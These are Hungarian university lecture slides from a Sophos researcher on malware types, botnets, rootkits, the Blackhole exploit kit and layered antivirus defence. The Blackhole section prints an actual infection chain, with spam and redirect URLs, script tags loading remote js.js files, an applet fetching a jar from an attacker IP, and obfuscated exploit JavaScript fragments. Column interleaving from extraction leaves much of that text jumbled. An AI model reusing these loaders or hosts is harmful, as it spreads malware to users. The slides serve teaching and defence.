IT biztonság 2014/2015 tanév Vírusvédelem Szappanos Gábor Sophos 2014.11.02. 1 Oxford UK SophosLabs Vancouver Canada Budapest Hungary Global presence Sydney Australia UK,Hungary, Canada, Australia 24/7, 365 day/year 1
Alapfogalmak Vírusok Férgek Olyan önreprodukáló számítógépes program, amely úgy fertőz más programokat, hogy azok tartalmazzák a vírus egy (esetleg megváltoztatott) új példányát. Olyan szoftver, aminek a célja az, hogy a felhasználóhoz reklám tartalmú üzeneteket juttasson el. Alapfogalmak Olyanszoftver, amineka célja az, hogy a felhasználótól annak tudta nélkül információt juttasson el egy harmadik félhez. Adware, spyware Legálisnak látszó program, aminek szándékoltan az célja, hogy a számítógép működését zavarja, vagy kárt okozzon. Trójaiak Greyware A greyware-ek legális körülmények között forgalmazott alkalmazások, melyeknél megvan az esély arra, hogya felhasználó tudtanélkül, ártó szándékkal települtek fel a számítógépre. 2
Vírusok csoportosítása Fertőzött objektum alapján: Boot szektor: Boot vírus Futtatható program: Program vírus Dokumentum: Makró vírus Script program: Script vírus Ø: Féreg Fertőzési mód alapján: Direkt akció Rezidens 2014.11.02. 5 Az ősidőkben... Fertőzött objektum: Boot rekord (FBR, MBR) Program Makrókód Script Férgek 2014.11.02. 6 3
DOS programok fertőzése MZ MZ Fejléc méret Memória méret Fejléc méret Memória méret SS:SP CS:IP SS:SP CS:IP DOS fejléc DOS fejléc Belépési pont Kód Belépési pont Kód Verem Belépési pont Víruskód Verem 7 Windows PE programok 4
DOS vírus esete PE programmal MZ DOS fejléc DOS stub CS:IP MZ DOS fejléc DOS stub CS:IP PE PE fejléc CS:EIP PE PE fejléc CS:EIP Data directories Export tábla Import tábla Section tábla Data directories Export tábla Import tábla Section tábla Víruskód Sections.text.data.rsrc Sections.text.data.rsrc 9 Makróvírusok Boot File Macro Script I-Worm Concept 1996 1997 1998 1999 2000 2001 2002 2003 2004 2005 2014.11.02. 10 5
1995: Concept Csak a programokat gondolták veszélyesnek Dokumentumokat gyakran cserélnek Könnyű programozhatóság Gyenge védelem Forráskódban terjed, a dokumentummal együtt Főleg MS Word és Excel 2014.11.02. 11 Fejlődő védettség 12 6
A leggyengébb láncszem 2004: a profik színre lépnek Addig: hobbi vírusírók Botnetek megjelenése Exploitok, trójaiak, botnetek, lopott adatok feketepiaca Kis incidensek riasztási szint alatt Célzott támadások ipari kémkedés céljából Bagle - Netsky háború 14 7
Beérkező kártevők naponta, platformonként 1000000 100000 10000 1000 100 OSX Nix Android Windows 10 1 Malware Samples Platformok veszélyeztetettsége 2 3 4 ios 5 4 6 8 Android 6 7 8 9 OSX 9 Windows Linux Profitability 8 7 6 5 4 3 8
Android fertőzések globális eloszlása Andr/GinMaster 2011 augusztusában bukkant fel először Több, mint 13,000 variánsa ismert Az eredeti játék futtatása mellett a GingerBreak exploit-al rootolják az eszközt Feltelepíti a kártevő programot, kapcsolatba lép a szerverrel, ahonnan további komponenseket telepít Adatokat lop a fertőzött eszközröl 9
Andr/GinMaster Terjesztés népszerű alkalmazásokon keresztül nemhivatalos marketplace-eken Kezdetben jórészt erotikus tartalom és ebook Mára szinte kizárólag játékok Andr/GinMaster 10
Első lépések a biztonság felé Banki jelszólopók Keylogging Form data capture Screen capture Mini screen capture Video capture MiTM böngésző adat lopás 2014.11.02. 22 11
Phishing Phishing 12
Botnetek Botnet: hálózati összeköttetésben levő programok koordinált hálózata Legális botnetek: SETI@Home, distributed SHA cracking Illegális botnetek: spambot, DDoS 2014.11.02. 25 Klasszikus botnet C&C 2014.11.02. 26 13
P2P botnet 2014.11.02. 27 Zeus botnet (Zbot) 2014.11.02. ELTE IT Biztonság Speci 28 14
Zitmo működés Zeus/Zitmo C & C server Send status& SMS messages Attacker SMS mtan Victim Botnetek vezérlése 2014.11.02. ELTE IT Biztonság Speci 30 15
Rootkitek Olyan program, aminek a célja objektumok (fájl, processz, registry, könyvtár) elrejtése a normál vizsgálatok elől. Bootkit User mód vs. kernel mód Operációs rendszer belső struktúráit módosítják (Microsoft vs. Alureon) 2014.11.02. ELTE IT Biztonság Speci 31 ZeroAccess Terjesztés: exploit kit, social engineering UAC dialóg átverése: tiszta Fash telepítő, trójai DLL Tűzfal, Windows védelmi programok leállítása Pszeudo-random DGA (rendszeridő alapján) Telepítési könyvtár pl.: c:\windows\$ntuninstallkb35373$ HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon Felülír egy random kiválasztott drivert A letöltött fájlok kódolva tároltak egy titkosított volume-on 64 biten user módú Payload: click fraud, spambot 2014.11.02. 32 16
Támadási felületek 2014.11.02. 34 17
Exploit kit támadás gyakorlatban Az Interneten keresztül történő támadások 2/3-a valamelyik exploit kit segítségével valósul meg. Ezek fele egyedül a Blackhole kithez kötődik 35 A Blackhole kit névjegy Orosz fejlesztés Bérelhető infrastruktúra Traffic direction system (TDS) MySQL backend IP feketelista Malware terjesztés v. átirányítás Integrált víruskeresők Management felület, részletes statisztikák Közbenső oldalakat lopott jelszavakkal vagy SQL injektálással fertőzik 18
Traffic Direction System TDS működésben GET http://www.google.com/ig/cp/get?hl=en&gl=&authuser=0&bundlejs=0 HTTP/1.1 Host: www.google.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: */* Referer: http://www.google.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-us,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 If-None-Match: 4507273103833835255 If-Modified-Since: Tue, 11 Oct 2011 08:30:50 GMT Browser agent IP cím, feketelista Operációs rendszer 19
Blackhole eszközkészlet CVE Target Description CVE-2012-4681 Java Java forname, getfield vulnerability CVE-2012-0507 Java Java AtomicReferenceArray vulnerability CVE-2011-3544 Java Oracle Java SE Rhino Script Engine Remote Code Execution vulnerability CVE-2011-2110 Flash Adobe Flash Player unspecified code execution (APSB11-18) CVE-2011-0611 Flash Adobe Flash Player unspecified code execution (APSA11-02) CVE-2010-3552 Java Skyline CVE-2010-1885 Windows Microsoft Windows Help and Support Center (HCP) CVE-2010-1423 Java Java Deployment Toolkit insufficient argument validation CVE-2010-0886 Java Unspecified vulnerability CVE-2010-0842 Java JRE MixerSequencer invalid array index CVE-2010-0840 Java Java trusted Methods Chaining CVE-2010-0188 PDF LibTIFF integer overflow CVE-2009-1671 Java Deployment Toolkit ActiveX control CVE-2009-4324 PDF Use after free vulnerability in doc.media.newplayer CVE-2009-0927 PDF Stack overflow via crafted argument to Collab.getIcon CVE-2008-2992 PDF Stack overflow via crafted argument to util.printf CVE-2007-5659 PDF collab.collectemailinfo CVE-2006-0003 IE MDAC Blackhole TDS Exploit delivered Java (CVE-2010-0840, CVE-2012-0507) Non- XMLHTTP+ADODB STREAM downloader 3: CVE-2009-0927, CVE-2008-2992, CVE-2009-4324 4: CVE-2010-0188 Hcp(CVE-2010-1885) XMLHTTP+ ADODB Vista: IE7,IE8 Win7: IE9, IE10 Win7: Mozilla2 2, Opera12, Safari5 Android: Safari5 Win7: Firefox14 Vista: IE6 Windows platforms WinNT90: IE9 Win8:Chrome1 7 OSX: IE5 WinCE: IE4 Win2K: Firefox5 WinXP:IE9 WinXP: Chrome17 Win95: IE4 Win98: IE4,IE5,IE6 WinNT: IE5 WinNT351: IE5 WinNT40: IE5 Win2K: IE4,IE5,IE6 + + + + - + + - + + + + + + - - - + - - - + - - - + - - + (IFRAME) + (object) + (object + IFRAME) + (IFRAM E) - + (IFRAME) + (object) - + (object + IFRAME) - - - - - - - - - + + (IFRAME) (link) + (object) + (link) + (IFRAME) Win2K3: IE7 + (IFRAME) - + Flash (CVE-2011-0611) - - - - + + + + + + + + + + Flash (Troj/SWFExp-BC) + + + + + + + + + + + + + + CVE-2012-1889 - - - - - - - - - - - - - - (embed) Win2K: IE8 WinXP: AOL96 + (object) + (embed) 20
Blackhole exploit kit 2014.11.02. 41 Blackhole fertőzési séma 1. átirányító oldal Spam e-mail: http://bridgetblonde.info/kkkxkebx/index.html http://3d-cam.com/jiq9vfzm/index.html http://armovies.com.ar/e2fscr2g/index.html http://armovies.com.ar/x12rswiw/index.html http://chomikuj24.pl/kkkxkebx/index.html Átirányító script : http://bragan.net/cwm8 EscN/js.js Átirányító script : </html> http://66.165.125.19/1ft eehma/js.js Átirányító script : http://74.119.235.211/11 4oTzgs/js.js Blackhole szerver http://72.14.187.169/show thread.php?t=73a07bcb51 f4be71 <html> <h1>wait PLEASE</h1> <h3>loading...</h3> <script type="text/javascript" src="http://66.165.125.19/1fteehma/js.js"></script> <script type="text/javascript" src="http://74.119.235.211/114otzgs/js.js"></script> <script type="text/javascript" src="http://akdegirmen.com/xlwjdw7s/js.js"></script> <script type="text/javascript" src="http://bragan.net/cwm8escn/js.js"></script> <script type="text/javascript" PDF exploit MDAC exploit src="http://casodisneyludico.ehost.com.ar/e1vu1o8j/js.js"></script> http://72.14.187.169/q.php? f=e4a98&e=1 http://72.14.187.169/q.php?f =e4a98&e=4 <html><body><applet document.write('<center><h1>please code='e.class' wait page is loading...</h1></center><hr>');function archive='http://72.14.187.169/content/gplugin.jar'><param end_redirect(){}var pdfver=[0,0,0,0],flashver=[0,0,0,0];try{var name="p" PluginDetect={version:"0.7.6",name:"PluginDetect",handler:function(c,b,a){return test="12" valu="12" value="vssmlggo3pd5pdbopd=/gipmvm- Java exploit Vc657/BG6cr"/></applet><script> function(){c(b,a)}},isdefined:function(b){return SWF exploit typeof http://72.14.187.169/conte try{asd();}catch(qweasf){a=["g<h6>f=7.49b7f('ohf=7f9moczm[?fj8f b!="undefined"},isarray:function(b){return(/array/i).test(object.prototype.tostring.call(b))},is http://72.14.187.169/q.php nt/gplugin.jar 4JB7 ;JDF B8?<JGB=D...o/Czmo/HF=7F9moC9m')pE6=H7B<= Func:function(b){return?f=e4a98&e=2 typeof b=="function"},isstring:function(b){return F=GL9FGB9FH7()0}5J9 typeof ;GE5F9nP{,{,{,{N,E?J8C5F9nP{,{,{,{Np79205J","9 b=="string"},isnum:function(b){return typeof [?6DB=gF7FH7n05F98B<=q\"{.t.u\",=J>Fq\"[?6DB=gF7FH7\",CJ=G?F9qE6=H7B<=(H,I,J)09F769 b=="number"},isstrnum:function(b){return(typeof = b=="string"&&(/\d/).test(b))},getnumregx:/[\d][\d\.\_,-]*/,splitnumregx:/[\.\_,- E6=H7B<=()0H(I,J)}},B8gFEB=FGqE6=H7B<=(I)09F769= 72;F<E document.location='http://72.14.187.169/showthread.php?t=73a07bcb51f4be71'; I!n\"6=GFEB=","FG\"},B8j99J2qE6= ]/g,getnum:function(b,c){var d=this,a=d.isstrnum(b)?(d.isdefined(c)?new Payload: FakeAV Payload: ZeroAccess Payload: ZBot 42 21
Blackhole payload Backdoor 6% Downloader ZAccess 2% 6% other 9% Zbot 25% FakeAV 11% Sinowal 11% PWS 12% Ransomware 18% 43 44 22
Mi a víruskeresés? Aszimmetrikushipotézisteszt, Hipotézisteszt, ahol a nullhipotézis: ahola nullhipotézis: tiszta tiszta állomány, állomány, az az alternatív hipotézis: malware Ha a nullhipotézistelvetjük, pedig igaz, akkorelsőfajú hibát(fals pozitív, alfa (α) hiba) követünk el; ha ellenben elfogadjuk, pedig nem igaz, akkormásodfajú hibát(fals negatív, béta (β) hiba) követünk el. Többrétegű védelem Application Control Potenciálisan veszélyes alkalmazások nem futhatnak Anti-Spam Tömegesen terjesztett e-mailek szűrése Víruskereső Ismert kártevők specifikus, új kártevők generikus felismerése Tűzfal Kommunikációs kísérletek blokkolása, külső támadások szűrése IPS Csomagszintű felismerés URL szűrés Reputációs és feketelista alapú szűrés Data Loss Prevention Szenzitív információk kiszivárgásának megakadályozása Exploit védelem Biztonsági hibák kihasználásának detektálása Viselkedésalapú védelem A futó program által a rendszerben végzett műveletek ellenőrzése 23
Application Control Potenciálisan veszélyes alkalmazások nem futhatnak Többrétegű védelem Anti-Spam Tömegesen terjesztett e-mailek szűrése Anti-Spam Terjesztéshez használt levelek blokkolása Víruskereső Ismert kártevők specifikus, új kártevők generikus felismerése Tűzfal Kommunikációs kísérletek blokkolása, külső támadások szűrése IPS Csomagszintű felismerés URL szűrés Reputációs és feketelista alapú szűrés Data Loss Prevention Szenzitív információk kiszivárgásának megakadályozása URL szűrés A letöltési láncban használt weboldalak blokkolása Víruskereső Víruskereső Exploit védelem Víruskereső Viselkedésal apú védelem Az exploitokat letöltő és futtató scriptek detektálása Az exploitot tartalmazó letöltött fájlok (SWF, PDF, Java, HTML) detektálása Alkalmazás exploitálás detektálása A letöltött Win32 payload detektálása A futtatott Win32 payload detektálása Exploit védelem Biztonsági hibák kihasználásának detektálása Viselkedésalapú védelem A futó program által a rendszerben végzett műveletek ellenőrzése Data Loss Prevention Szenzitív információk kiszivárgásának megakadályozása Tűzfal DLP A vezérlő szerverrel való kapcsolatfelvétel detektálása Lopott adatok kiküldésének detektálása Víruskereső tesztek Melyik a legjobb víruskereső? a.vírusfelismerési arány b.proaktív felismerési képesség c.memóriahasználat d.sebesség e.platform lefedettség f. Stabilitás 2014.11.02. 48 24
Alapelvek 1. Testing must not endanger the public. 2. Testing must be unbiased. 3. Testing should be reasonably open and transparent. 4. The effectiveness and performance of anti malware products must be measured in a balanced way. 5. Testers must take reasonable care to validate whether test samples or test cases have been accurately classified as malicious, innocent or invalid. 6. Testing methodology must be consistent with the testing purpose. 7. The conclusions of a test must be based on the test results. 8. Test results should be statistically valid. 9. Vendors, testers and publishers must have an active contact point for testing related correspondence. 2014.11.02. 49 Rossz tesztek 2014.11.02. 50 25
Rossz tesztek Anti-Spam Terjesztéshez használt levelek blokkolása URL szűrés A letöltési láncban használt weboldalak blokkolása Víruskereső Az exploitokat letöltő és futtató scriptek detektálása Víruskereső Az exploitot tartalmazó letöltött fájlok (SWF, PDF, Java, HTML) detektálása Exploit védelem Alkalmazás exploitálás detektálása Víruskereső A letöltött Win32 payload detektálása Viselkedésalapú védelem A futtatott Win32 payload detektálása Tűzfal A vezérlő szerverrel való kapcsolatfelvétel detektálása 2014.11.02. 51 Terjesztéshez használt levelek blokkolása Rossz tesztek Anti-Spam Anti-virus products are rubbish, says Imperva URL szűrés Spend not proportional to effectiveness By Richard Chirgwin Víruskereső A letöltési láncban használt weboldalak blokkolása Az exploitokat letöltő és futtató scriptek detektálása A study released in December by US security outfit Impervahas tipped a bucket Az exploitot tartalmazó letöltött fájlok (SWF, PDF, Java, HTML) detektálása Víruskereső on the multi-billion-dollar anti-virus industry, claiming that initial detection rates are as low as five percent, and concluding that enterprise and consumer anti-virus spend is not Alkalmazás proportional exploitálás to its detektálása effectiveness. Exploit védelem Working in conjunction with students from the Technion-Israel Institute of Technology, the company A tested letöltött Win32 82 malware payload detektálása samples against 40 anti-virus Víruskereső products including offerings from Microsoft, Symantec, McAfee and Kaspersky. The test revealed that while catalogued viruses are well-detected, less than 5% A futtatott Win32 payload detektálása Viselkedésalapú of anti-virus solutions védelem in the study were able to initially detect previously noncataloged viruses and that many solutions took up to a month or longer following the initial scan A to vezérlő update szerverrel their való signatures. kapcsolatfelvétel detektálása Tűzfal 2014.11.02. 52 26
Jó tesztek 2014.11.02. 53 Zárszó Naprakész vírusvédelem Biztonsági javítások telepítése Say no to social engineering Java frissítések!!!!!! 27